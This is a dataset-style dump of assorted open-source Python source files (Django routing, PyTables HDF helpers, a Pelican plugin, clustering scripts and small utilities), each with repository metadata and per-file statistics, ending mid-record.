"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""API routes config for notifai_recruitment project.
REST framework adds support for automatic URL routing to Django, and provides simple, quick and consistent
way of wiring view logic to a set of URLs.
For more information on this file, see
https://www.django-rest-framework.org/api-guide/routers/
"""
from rest_framework import routers
from textify.api.views import NoteViewSet
router = routers.DefaultRouter()
router.register(r'notes', NoteViewSet)
| 28.352941 | 106 | 0.778008 | 71 | 482 | 5.253521 | 0.746479 | 0.104558 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002392 | 0.13278 | 482 | 16 | 107 | 30.125 | 0.889952 | 0.665975 | 0 | 0 | 0 | 0 | 0.03268 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
4643409696cd3d49a508459df5a413ef73fb761e | 301 | py | Python | src/kol/request/CampgroundRestRequest.py | danheath/temppykol | 7f9621b44df9f9d2d9fc0a5b2a06db116b9ccfab | [
"BSD-3-Clause"
] | 19 | 2015-02-16T08:30:49.000Z | 2020-05-01T06:06:33.000Z | src/kol/request/CampgroundRestRequest.py | danheath/temppykol | 7f9621b44df9f9d2d9fc0a5b2a06db116b9ccfab | [
"BSD-3-Clause"
] | 5 | 2015-01-13T23:01:54.000Z | 2016-11-30T15:23:43.000Z | src/kol/request/CampgroundRestRequest.py | danheath/temppykol | 7f9621b44df9f9d2d9fc0a5b2a06db116b9ccfab | [
"BSD-3-Clause"
] | 19 | 2015-05-28T09:36:19.000Z | 2022-03-15T23:19:29.000Z | from kol.request.GenericRequest import GenericRequest
class CampgroundRestRequest(GenericRequest):
"Rests at the user's campground."
def __init__(self, session):
super(CampgroundRestRequest, self).__init__(session)
self.url = session.serverURL + 'campground.php?action=rest'
| 33.444444 | 67 | 0.750831 | 32 | 301 | 6.8125 | 0.71875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156146 | 301 | 8 | 68 | 37.625 | 0.858268 | 0.10299 | 0 | 0 | 0 | 0 | 0.189369 | 0.086379 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4643c3f57a3b1cef340d6b9803b645c83275e77f | 849 | py | Python | pdlearn/adaptor/methods.py | richlewis42/pandas-learn | 4330c642e4f62e8abc6dcd58ba33daf22519f41e | [
"MIT"
] | 1 | 2015-12-16T04:03:19.000Z | 2015-12-16T04:03:19.000Z | pdlearn/adaptor/methods.py | lewisacidic/pandas-learn | 4330c642e4f62e8abc6dcd58ba33daf22519f41e | [
"MIT"
] | 3 | 2015-12-10T02:05:13.000Z | 2015-12-16T04:04:16.000Z | pdlearn/adaptor/methods.py | lewisacidic/pandas-learn | 4330c642e4f62e8abc6dcd58ba33daf22519f41e | [
"MIT"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is part of pandas-learn
# https://github.com/RichLewis42/pandas-learn
#
# Licensed under the MIT license:
# http://www.opensource.org/licenses/MIT
# Copyright (c) 2015, Rich Lewis <rl403@cam.ac.uk>
"""
pdlearn.adaptor.methods
~~~~~~~~~~~~~~~~~~~~~~~
Module implementing methods for pdlearn classes.
"""
import pandas as pd
def feature_property(name):
"""
Create a method adapting a parent class' property to return a pandas frame.
"""
# pylint: disable=C0111
@property
def method(self):
# pylint: disable=W0212
with self._unyouthanize():
prop = getattr(self, name + '_')
if self.pandas_mode_:
return pd.Series(prop, index=self.feature_names_, name=name)
else:
return prop
return method
| 22.945946 | 79 | 0.628975 | 106 | 849 | 4.971698 | 0.707547 | 0.041746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027523 | 0.229682 | 849 | 36 | 80 | 23.583333 | 0.778287 | 0.540636 | 0 | 0 | 0 | 0 | 0.002801 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
464a949d4e46e87b22e002325b18acfc9b8c6a90 | 592 | py | Python | src/storage-preview/azext_storage_preview/vendored_sdks/azure_storage/v2018_03_28/file/__init__.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | [
"MIT"
] | 207 | 2017-11-29T06:59:41.000Z | 2022-03-31T10:00:53.000Z | src/storage-preview/azext_storage_preview/vendored_sdks/azure_storage/v2018_03_28/file/__init__.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | [
"MIT"
] | 4,061 | 2017-10-27T23:19:56.000Z | 2022-03-31T23:18:30.000Z | src/storage-preview/azext_storage_preview/vendored_sdks/azure_storage/v2018_03_28/file/__init__.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | [
"MIT"
] | 802 | 2017-10-11T17:36:26.000Z | 2022-03-31T22:24:32.000Z | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from .fileservice import FileService
from .models import (
Share,
ShareProperties,
File,
FileProperties,
Directory,
DirectoryProperties,
FileRange,
ContentSettings,
CopyProperties,
SharePermissions,
FilePermissions,
DeleteSnapshot,
)
| 28.190476 | 76 | 0.540541 | 41 | 592 | 7.804878 | 0.853659 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163851 | 592 | 20 | 77 | 29.6 | 0.646465 | 0.505068 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.133333 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
464bc6633efce25b9cc1abebeb497f50584d997d | 1,424 | py | Python | egs/cops/s5/local/text2json.py | Shuang777/kaldi-2016 | 5373fe4bd80857b53134db566cad48b8445cf3b9 | [
"Apache-2.0"
] | null | null | null | egs/cops/s5/local/text2json.py | Shuang777/kaldi-2016 | 5373fe4bd80857b53134db566cad48b8445cf3b9 | [
"Apache-2.0"
] | null | null | null | egs/cops/s5/local/text2json.py | Shuang777/kaldi-2016 | 5373fe4bd80857b53134db566cad48b8445cf3b9 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import sys
import json
def sec2str(seconds):
sec_int = int(round(seconds))
hh = sec_int / 3600
mm = (sec_int - hh * 3600) / 60
ss = sec_int - hh * 3600 - mm * 60
return "%d:%02d:%02d" % (hh, mm, ss)
if len(sys.argv) != 4:
print "Usage:", __file__, "<segment> <text> <json>"
print " e.g.:", __file__, "data/dev/segmetns data/dev/text trans.json"
sys.exit(1)
segment_filename = sys.argv[1]
text_filename = sys.argv[2]
output_filename = sys.argv[3]
start_time = {}
end_time = {}
utt2chn = {}
utt2id = {}
with open(segment_filename) as segmentfile:
for line in segmentfile:
fields = line.split()
utt = fields[0]
start_time[utt] = float(fields[2]);
end_time[utt] = float(fields[3]);
id, chn = fields[1].split("_", 1)
utt2chn[utt] = chn
utt2id[utt] = id
data = {}
with open(text_filename) as textfile:
for line in textfile:
utt, text = line.split(" ", 1)
chn = utt2chn[utt]
if chn not in data:
data[chn] = {
'EmpID1': utt2id[utt],
'transcript': []
}
start = sec2str(start_time[utt])
end = sec2str(end_time[utt])
utt_info = {
'start': start,
'end': end,
'usable': True,
'speaker': 'OFFICER',
'utterance': text.strip()
}
data[chn]['transcript'].append(utt_info)
with open(output_filename, 'w') as outfile:
json.dump(data, outfile)
| 21.907692 | 72 | 0.589888 | 197 | 1,424 | 4.126904 | 0.385787 | 0.02952 | 0.055351 | 0.02952 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038246 | 0.247191 | 1,424 | 64 | 73 | 22.25 | 0.720149 | 0.014045 | 0 | 0 | 0 | 0 | 0.110478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.04 | null | null | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
46522be46094275849b7f3b3da9bf2d51591f8c8 | 10,754 | py | Python | contrib/make_hdf.py | scopatz/PyTables | 05a74def785688abd802224a5ba44393a701ebc7 | [
"BSD-3-Clause"
] | 9 | 2021-09-28T05:20:22.000Z | 2022-03-16T11:09:06.000Z | contrib/make_hdf.py | scopatz/PyTables | 05a74def785688abd802224a5ba44393a701ebc7 | [
"BSD-3-Clause"
] | null | null | null | contrib/make_hdf.py | scopatz/PyTables | 05a74def785688abd802224a5ba44393a701ebc7 | [
"BSD-3-Clause"
] | 9 | 2018-09-14T02:42:36.000Z | 2021-07-12T02:37:45.000Z | #!/usr/bin/env python
from __future__ import generators
import tables, cPickle, time
#################################################################################
def is_scalar(item):
try:
iter(item)
#could be a string
try:
item[:0]+'' #check for string
return 'str'
except:
return 0
except:
return 'notstr'
def is_dict(item):
try:
item.iteritems()
return 1
except:
return 0
def make_col(row_type, row_name, row_item, str_len):
'''for strings it will always make at least 80 char or twice mac char size'''
set_len=80
if str_len:
if 2*str_len>set_len:
set_len=2*str_len
row_type[row_name]=tables.Col("CharType", set_len)
else:
type_matrix={
int: tables.Col("Int32", 1),
float: tables.Col("Float32", 4), #Col("Int16", 1)
}
row_type[row_name]=type_matrix[type(row_item)]
def make_row(data):
row_type={}
scalar_type=is_scalar(data)
if scalar_type:
if scalar_type=='str':
make_col(row_type, 'scalar', data, len(data))
else:
make_col(row_type, 'scalar', data, 0)
else: #it is a list-like
the_type=is_scalar(data[0])
if the_type=='str':
#get max length
the_max=0
for i in data:
if len(i)>the_max:
the_max=len(i)
make_col(row_type, 'col', data[0], the_max)
elif the_type:
make_col(row_type, 'col', data[0], 0)
else: #list within the list, make many columns
make_col(row_type, 'col_depth', 0, 0)
count=0
for col in data:
the_type=is_scalar(col[0])
if the_type=='str':
#get max length
the_max=0
for i in data:
if len(i)>the_max:
the_max=len(i)
make_col(row_type, 'col_'+str(count), col[0], the_max)
elif the_type:
make_col(row_type, 'col_'+str(count), col[0], 0)
else:
raise ValueError('too many nested levels of lists')
count+=1
return row_type
def add_table(fileh, group_obj, data, table_name):
#figure out if it is a list of lists or a single list
#get types of columns
row_type=make_row(data)
table1=fileh.createTable(group_obj, table_name, row_type, 'H', compress=1)
row=table1.row
if is_scalar(data):
row['scalar']=data
row.append()
else:
if is_scalar(data[0]):
for i in data:
row['col']=i
row.append()
else:
count=0
for col in data:
row['col_depth']=len(col)
for the_row in col:
if is_scalar(the_row):
row['col_'+str(count)]=the_row
row.append()
else:
raise ValueError('too many levels of lists')
count+=1
table1.flush()
def add_cache(fileh, cache):
group_name='pytables_cache_v0';table_name='cache0'
root=fileh.root
group_obj=fileh.createGroup(root, group_name)
cache_str=cPickle.dumps(cache, 0)
cache_str=cache_str.replace('\n', chr(1))
cache_pieces=[]
while cache_str:
cache_part=cache_str[:8000];cache_str=cache_str[8000:]
if cache_part:
cache_pieces.append(cache_part)
row_type={}
row_type['col_0']=tables.Col("CharType", 8000)
#
table_cache=fileh.createTable(group_obj, table_name, row_type, 'H', compress =1)
for piece in cache_pieces:
print len(piece)
table_cache.row['col_0']=piece
table_cache.row.append()
table_cache.flush()
def save2(hdf_file, data):
fileh=tables.openFile(hdf_file, mode='w', title='logon history')
root=fileh.root;cache_root=cache={}
root_path=root._v_pathname;root=0
stack = [ (root_path, data, cache) ]
table_num=0
count=0
while stack:
(group_obj_path, data, cache)=stack.pop()
#data='wilma':{'mother':[22,23,24]}}
#grp_name wilma
for grp_name in data:
#print 'fileh=',fileh
count+=1
cache[grp_name]={}
new_group_obj=fileh.createGroup(group_obj_path, grp_name)
#print 'path=',new_group_obj._v_pathname
new_path=new_group_obj._v_pathname
#if dict, you have a bunch of groups
if is_dict(data[grp_name]):#{'mother':[22,23,24]}
stack.append((new_path, data[grp_name], cache[grp_name]))
#you have a table
else:
#data[grp_name]=[110,130,140],[1,2,3]
add_table(fileh, new_path, data[grp_name], 'tbl_'+str(table_num))
table_num+=1
#fileh=tables.openFile(hdf_file,mode='a',title='logon history')
add_cache(fileh, cache_root)
fileh.close()
########################
class Hdf_dict(dict):
def __init__(self,hdf_file,hdf_dict={},stack=[]):
self.hdf_file=hdf_file
self.stack=stack
if stack:
self.hdf_dict=hdf_dict
else:
self.hdf_dict=self.get_cache()
self.cur_dict=self.hdf_dict
def get_cache(self):
fileh=tables.openFile(self.hdf_file, rootUEP='pytables_cache_v0')
table=fileh.root.cache0
total=[]
print 'reading'
begin=time.time()
for i in table.iterrows():
total.append(i['col_0'])
total=''.join(total)
total=total.replace(chr(1), '\n')
print 'loaded cache len=', len(total), time.time()-begin
begin=time.time()
a=cPickle.loads(total)
print 'cache', time.time()-begin
return a
def has_key(self, k):
return k in self.cur_dict
def keys(self):
return self.cur_dict.keys()
def get(self,key,default=None):
try:
return self.__getitem__(key)
except:
return default
def items(self):
return list(self.iteritems())
def values(self):
return list(self.itervalues())
###########################################
def __len__(self):
return len(self.cur_dict)
def __getitem__(self, k):
if k in self.cur_dict:
#now check if k has any data
if self.cur_dict[k]:
new_stack=self.stack[:]
new_stack.append(k)
return Hdf_dict(self.hdf_file, hdf_dict=self.cur_dict[k], stack=new_stack)
else:
new_stack=self.stack[:]
new_stack.append(k)
fileh=tables.openFile(self.hdf_file, rootUEP='/'.join(new_stack))
#cur_data=getattr(self.cur_group,k) #/wilma (Group) '' =getattr(/ (Group) 'logon history',wilma)
for table in fileh.root:
#return [ i['col_1'] for i in table.iterrows() ] #[9110,91]
#perhaps they stored a single item
try:
for item in table['scalar']:
return item
except:
#otherwise they stored a list of data
try:
return [ item for item in table['col']]
except:
cur_column=[]
total_columns=[]
col_num=0
cur_row=0
num_rows=0
for row in table:
if not num_rows:
num_rows=row['col_depth']
if cur_row==num_rows:
cur_row=num_rows=0
col_num+=1
total_columns.append(cur_column)
cur_column=[]
cur_column.append( row['col_'+str(col_num)])
cur_row+=1
total_columns.append(cur_column)
return total_columns
else:
raise KeyError(k)
def iterkeys(self):
for key in self.iterkeys():
yield key
def __iter__(self):
return self.iterkeys()
def itervalues(self):
for k in self.iterkeys():
v=self.__getitem__(k)
yield v
def iteritems(self):
# yield children
for k in self.iterkeys():
v=self.__getitem__(k)
yield (k, v)
def __repr__(self):
return '{Hdf dict}'
def __str__(self):
return self.__repr__()
#####
def setdefault(self,key,default=None):
try:
return self.__getitem__(key)
except:
self.__setitem__(key)
return default
def update(self, d):
for k, v in d.iteritems():
self.__setitem__(k, v)
def popitem(self):
try:
k, v = self.iteritems().next()
del self[k]
return k, v
except StopIteration:
raise KeyError("Hdf Dict is empty")
def __setitem__(self, key, value):
raise NotImplementedError
def __delitem__(self, key):
raise NotImplementedError
def __hash__(self):
raise TypeError("Hdf dict bjects are unhashable")
if __name__=='__main__':
def write_small(file=''):
data1={
'fred':['a', 'b', 'c'],
'barney':[[9110, 9130, 9140], [91, 92, 93]],
'wilma':{'mother':{'pebbles':[22, 23, 24],'bambam':[67, 68, 69]}}
}
print 'saving'
save2(file, data1)
print 'saved'
def read_small(file=''):
#a=make_hdf.Hdf_dict(file)
a=Hdf_dict(file)
print a['wilma']
b=a['wilma']
for i in b:
print i
print a.keys()
print 'has fred', bool('fred' in a)
print 'length a', len(a)
print 'get', a.get('fred'), a.get('not here')
print 'wilma keys', a['wilma'].keys()
print 'barney', a['barney']
print 'get items'
print a.items()
for i in a.iteritems():
print 'item', i
for i in a.itervalues():
print i
a=raw_input('enter y to write out test file to test.hdf')
if a.strip()=='y':
print 'writing'
write_small('test.hdf')
print 'reading'
read_small('test.hdf')
| 30.292958 | 112 | 0.505951 | 1,324 | 10,754 | 3.888218 | 0.175227 | 0.023116 | 0.01554 | 0.021756 | 0.227661 | 0.177933 | 0.129759 | 0.113636 | 0.101204 | 0.096737 | 0 | 0.020655 | 0.369723 | 10,754 | 354 | 113 | 30.378531 | 0.738861 | 0.073368 | 0 | 0.284173 | 0 | 0 | 0.057696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.007194 | null | null | 0.071942 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
465234088d4677a447f6bdb4657e058e1a45f5b8 | 2,234 | py | Python | jinja2content.py | firemark/new-site | b7d54320f8e1cfae489108f87f64761ce2510676 | [
"MIT"
] | null | null | null | jinja2content.py | firemark/new-site | b7d54320f8e1cfae489108f87f64761ce2510676 | [
"MIT"
] | null | null | null | jinja2content.py | firemark/new-site | b7d54320f8e1cfae489108f87f64761ce2510676 | [
"MIT"
] | null | null | null | """
jinja2content.py
----------------
DONT EDIT THIS FILE
Pelican plugin that processes Markdown files as jinja templates.
"""
from jinja2 import Environment, FileSystemLoader, ChoiceLoader
import os
from pelican import signals
from pelican.readers import MarkdownReader, HTMLReader, RstReader
from pelican.utils import pelican_open
from tempfile import NamedTemporaryFile
class JinjaContentMixin:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# will look first in 'JINJA2CONTENT_TEMPLATES', by default the
# content root path, then in the theme's templates
local_dirs = self.settings.get('JINJA2CONTENT_TEMPLATES', ['.'])
local_dirs = [os.path.join(self.settings['PATH'], folder)
for folder in local_dirs]
theme_dir = os.path.join(self.settings['THEME'], 'templates')
loaders = [FileSystemLoader(_dir) for _dir
in local_dirs + [theme_dir]]
if 'JINJA_ENVIRONMENT' in self.settings: # pelican 3.7
jinja_environment = self.settings['JINJA_ENVIRONMENT']
else:
jinja_environment = {
'trim_blocks': True,
'lstrip_blocks': True,
'extensions': self.settings['JINJA_EXTENSIONS']
}
self.env = Environment(
loader=ChoiceLoader(loaders),
**jinja_environment)
def read(self, source_path):
with pelican_open(source_path) as text:
text = self.env.from_string(text).render()
with NamedTemporaryFile(delete=False) as f:
f.write(text.encode())
f.close()
content, metadata = super().read(f.name)
os.unlink(f.name)
return content, metadata
class JinjaMarkdownReader(JinjaContentMixin, MarkdownReader):
pass
class JinjaRstReader(JinjaContentMixin, RstReader):
pass
class JinjaHTMLReader(JinjaContentMixin, HTMLReader):
pass
def add_reader(readers):
for Reader in [JinjaMarkdownReader, JinjaRstReader, JinjaHTMLReader]:
for ext in Reader.file_extensions:
readers.reader_classes[ext] = Reader
def register():
signals.readers_init.connect(add_reader)
| 31.027778 | 73 | 0.653984 | 238 | 2,234 | 5.987395 | 0.411765 | 0.050526 | 0.025263 | 0.019649 | 0.057544 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003574 | 0.248433 | 2,234 | 71 | 74 | 31.464789 | 0.845146 | 0.108774 | 0 | 0.06383 | 0 | 0 | 0.063636 | 0.011616 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085106 | false | 0.06383 | 0.12766 | 0 | 0.319149 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4654149e1951b836beb90c90a51fb7d22a7e21c8 | 200 | py | Python | Aulas/12aula(antigo)/readint.py | rafaelmcam/RTOs_ChibiOS | 08d8e21f2c7185d2c47846f67cbfba70c706d689 | [
"MIT"
] | 1 | 2019-05-14T22:31:25.000Z | 2019-05-14T22:31:25.000Z | Aulas/12aula(antigo)/readint.py | rafaelmcam/RTOs_ChibiOS | 08d8e21f2c7185d2c47846f67cbfba70c706d689 | [
"MIT"
] | null | null | null | Aulas/12aula(antigo)/readint.py | rafaelmcam/RTOs_ChibiOS | 08d8e21f2c7185d2c47846f67cbfba70c706d689 | [
"MIT"
] | null | null | null | import serial
with serial.Serial("/dev/ttyUSB0", 115200) as ser:
while 1:
for i in range(5):
n = ser.read()[0]
print("{:x}".format(n))
print("--------")
| 18.181818 | 50 | 0.47 | 26 | 200 | 3.615385 | 0.807692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 0.325 | 200 | 10 | 51 | 20 | 0.622222 | 0 | 0 | 0 | 0 | 0 | 0.120603 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0.285714 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
46548694a0ea521a51fee1aa569811ccc528f211 | 578 | py | Python | packages/pyre/parsing/Parser.py | avalentino/pyre | 7e1f0287eb7eba1c6d1ef385e5160079283ac363 | [
"BSD-3-Clause"
] | 25 | 2018-04-23T01:45:39.000Z | 2021-12-10T06:01:23.000Z | packages/pyre/parsing/Parser.py | avalentino/pyre | 7e1f0287eb7eba1c6d1ef385e5160079283ac363 | [
"BSD-3-Clause"
] | 53 | 2018-05-31T04:55:00.000Z | 2021-10-07T21:41:32.000Z | packages/pyre/parsing/Parser.py | avalentino/pyre | 7e1f0287eb7eba1c6d1ef385e5160079283ac363 | [
"BSD-3-Clause"
] | 12 | 2018-04-23T22:50:40.000Z | 2022-02-20T17:27:23.000Z | # -*- coding: utf-8 -*-
#
# michael a.g. aïvázis
# orthologue
# (c) 1998-2021 all rights reserved
#
class Parser:
"""
The base class for parsers
"""
# types
from .exceptions import ParsingError, SyntaxError, TokenizationError
# meta methods
def __init__(self, **kwds):
# chain up
super().__init__(**kwds)
# build my scanner
self.scanner = self.lexer()
# all done
return
# implementation details
lexer = None # my scanner factory
scanner = None # my scanner instance
# end of file
| 16.514286 | 72 | 0.595156 | 64 | 578 | 5.25 | 0.78125 | 0.080357 | 0.077381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022388 | 0.304498 | 578 | 34 | 73 | 17 | 0.813433 | 0.420415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
4658a352b7ba7209186ef3d47f169f46b8660613 | 2,182 | py | Python | src/visualization/visualize_dataset.py | ivangarrera/MachineLearning | c13584cdcb7c4df1ab2814cf42a3c2bd3c203e75 | [
"MIT"
] | null | null | null | src/visualization/visualize_dataset.py | ivangarrera/MachineLearning | c13584cdcb7c4df1ab2814cf42a3c2bd3c203e75 | [
"MIT"
] | null | null | null | src/visualization/visualize_dataset.py | ivangarrera/MachineLearning | c13584cdcb7c4df1ab2814cf42a3c2bd3c203e75 | [
"MIT"
] | null | null | null | from common_clustering import CommonClustering
#■clustering_features = CommonClustering(r'C:\Users\ivangarrera\Desktop\T2_cleaned.csv')
clustering_features = CommonClustering('D:\Ing. Informatica\Cuarto\Machine Learning\T2_cleaned_gyroscope.csv')
attr = list(clustering_features.data_set)[0][:list(clustering_features.data_set)[0].find('_')]
clustering_features.attr = attr
clustering_features.PrincipalComponentAnalysis(num_components=2)
# Get the number of clusters that provides the best results
ideal_number_of_clusters = clustering_features.getBestNumberOfClusters()
# Plot silhuettes array
clustering_features.PlotSilhouettes()
# Print k-means with the best number of clusters that have been found
labels = clustering_features.KMeansWithIdeal(ideal_number_of_clusters)
# Interprate k-means groups
clustering_features.data_set['labels'] = labels
data_set_labels_mean = clustering_features.data_set.groupby(['labels']).mean()
# Plot 3D graph to interpretate k-means groups
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = Axes3D(fig)
ax.scatter(data_set_labels_mean.values[:,0],
data_set_labels_mean.values[:,1],
data_set_labels_mean.values[:,2])
plt.savefig(r'../../reports/figures/centroids3D_{}.png'.format(attr))
plt.show()
# Agglomerative clustering algorithm using nearest neighbors matrix
clustering_features.AgglomerativeClusteringWithNearestNeighbors()
# DBSCAN Clustering algorithm
labels = clustering_features.DBSCANClustering()
# Interprate outliers
clustering_features.data_set['labels'] = labels
data_set_outliers = clustering_features.data_set.loc[(clustering_features.data_set['labels'] == -1)]
# Show outliers in a 3D graph with all points in the dataset
fig = plt.figure()
ax = Axes3D(fig)
ax.scatter(clustering_features.data_set.values[:,0],
clustering_features.data_set.values[:,1],
clustering_features.data_set.values[:,2])
ax.scatter(data_set_outliers.values[:,0],
data_set_outliers.values[:,1],
data_set_outliers.values[:,2], c='red', s=50)
plt.savefig(r'../../reports/figures/outliers3D_{}.png'.format(attr))
plt.show()
| 36.983051 | 110 | 0.779102 | 284 | 2,182 | 5.764085 | 0.369718 | 0.208919 | 0.134392 | 0.152718 | 0.327428 | 0.129505 | 0.092853 | 0.092853 | 0 | 0 | 0 | 0.012834 | 0.107241 | 2,182 | 58 | 111 | 37.62069 | 0.827002 | 0.219523 | 0 | 0.242424 | 0 | 0 | 0.103428 | 0.08156 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4660b825bf1a5e031627c3620c78b68944deb5c7 | 652 | py | Python | glue/core/tests/test_message.py | ejeschke/glue | 21689e3474aeaeb70e258d76c60755596856976c | [
"BSD-3-Clause"
] | 3 | 2015-09-10T22:23:55.000Z | 2019-04-04T18:47:33.000Z | glue/core/tests/test_message.py | ejeschke/glue | 21689e3474aeaeb70e258d76c60755596856976c | [
"BSD-3-Clause"
] | null | null | null | glue/core/tests/test_message.py | ejeschke/glue | 21689e3474aeaeb70e258d76c60755596856976c | [
"BSD-3-Clause"
] | 1 | 2019-08-04T14:10:12.000Z | 2019-08-04T14:10:12.000Z | from __future__ import absolute_import, division, print_function
import pytest
from .. import message as msg
def test_invalid_subset_msg():
with pytest.raises(TypeError) as exc:
msg.SubsetMessage(None)
assert exc.value.args[0].startswith('Sender must be a subset')
def test_invalid_data_msg():
with pytest.raises(TypeError) as exc:
msg.DataMessage(None)
assert exc.value.args[0].startswith('Sender must be a data')
def test_invalid_data_collection_msg():
with pytest.raises(TypeError) as exc:
msg.DataCollectionMessage(None)
assert exc.value.args[0].startswith('Sender must be a DataCollection')
| 27.166667 | 74 | 0.739264 | 91 | 652 | 5.120879 | 0.384615 | 0.045064 | 0.090129 | 0.122318 | 0.527897 | 0.527897 | 0.527897 | 0.527897 | 0.296137 | 0.296137 | 0 | 0.005525 | 0.167178 | 652 | 23 | 75 | 28.347826 | 0.85267 | 0 | 0 | 0.2 | 0 | 0 | 0.115031 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.2 | true | 0 | 0.2 | 0 | 0.4 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4660df17d48e40efbff3c55617fa7393819b5977 | 1,358 | py | Python | fabfile/config.py | kurochan/config-collector | 656da97eb219eb5bcf913173dd7aa76d0cedd44c | [
"MIT"
] | 1 | 2017-07-30T17:35:10.000Z | 2017-07-30T17:35:10.000Z | fabfile/config.py | kurochan/config-collector | 656da97eb219eb5bcf913173dd7aa76d0cedd44c | [
